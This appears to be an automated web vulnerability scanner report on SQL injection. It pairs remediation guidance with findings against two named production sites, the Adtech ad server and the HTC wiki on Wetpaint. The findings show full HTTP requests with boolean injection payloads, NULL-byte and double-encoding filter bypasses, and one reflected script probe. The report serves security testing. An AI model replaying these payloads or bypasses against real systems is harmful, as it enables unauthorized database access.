SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The autotrdr_exclude cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the autotrdr_exclude cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the autotrdr_exclude cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude%2527
Response 1
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 18937
The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00'; autotrdr_exclude=autotrdr_exclude;
Response 1 (redirected)
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 18756
Request 2
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00''; autotrdr_exclude=autotrdr_exclude;
Response 2 (redirected)
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 828
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00' HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;
Response 1
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 18756
Request 2
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00'' HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;
Response 2
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 994
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:31 GMT Server: Apache Set-Cookie: wab=joinButton=38; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:31 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPo6SRuabbqp; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=FC676FF8175FB9189B56FD2C05DD08B6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:31 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 37630
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>
<meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
<script type="text/javascript"> //<![CDATA[ var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone W ...[SNIP]...
Request 2
GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:32 GMT Server: Apache Set-Cookie: wab=joinButton=82; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:32 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcGTetEI1fA+k; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:32 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 37629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>
<meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:26 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4H880Qv8zfr+; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=D81A586ADE0621AAB28668E041DF5C6E; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:26 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57727
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:28 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4BEEDqu1Zw35; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:28 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 83263946'%20or%201%3d1--%20 and 83263946'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Smartphone+Blogs+and+Forums HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:07 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/GnGyRMdMSYE; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=6601282A68E6A62FD4318B3E0947F341; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:07 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 63010
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>
<meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" /> <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people's identity and status, how to please a secular concept to treat you and your phone,..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/Smartphone+Blogs+and+Forums HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:07 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/A+6ceTtRjSe; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:07 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 63009
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>
<meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" /> <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people's identity and status, how to please a secular concept to treat you and your phone,..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Smartphone+How-To HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:05 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDaHC6p64G+mQ; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=9241F2DA15E0BEA02A34D8A0A7517B1B; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:05 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 61669
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" /> <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/Smartphone+How-To HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:06 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDY8YVP9V3BKl; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:06 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 61668
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" /> <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 46190298'%20or%201%3d1--%20 and 46190298'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:34 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPRCQ+El/waa; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=0CC9698F48A8526EEA3937B4F7BB20E6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:34 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 55739
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:35 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcJoGo+pEYs0Y; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:35 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 55738
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
